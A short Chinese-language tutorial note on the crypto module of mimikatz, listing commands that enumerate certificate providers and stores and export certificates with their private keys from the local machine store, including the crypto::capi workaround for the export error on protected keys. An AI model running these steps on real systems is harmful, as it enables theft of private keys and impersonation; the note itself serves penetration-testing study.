mimikatz之crypto

mimikatz 导出证书及私钥:

模块:crypto(第一步privilege::debug)

1、列举证书提供者:crypto::providers   This command list all providers: CryptoAPI, then CNG if available (NT 6).

2、列举出证书:crypto::stores      This command lists logical store in a system store.(默认列举出的是CURRENT_USER,可以列出Local_Machine)


             2.1   crypto::stores /systemstore:local_machine


3、crypto::certificates             This command lists certificates and properties of theirs keys. It can export certificates too.

(默认也是Current_User,可以列出Local_machine:crypto::certificates /systemstore:local_machine)



4、导出证书:crypto::certificates /systemstore:local_machine /export

可以看出直接导出local_machine的证书和私钥时会报错:0x8009000b;这里的解决办法是:

crypto::capi

crypto::certificates /systemstore:local_machine /export



参考:https://github.com/gentilkiwi/mimikatz/wiki/module-~-crypto

你可能感兴趣的:(mimikatz之crypto)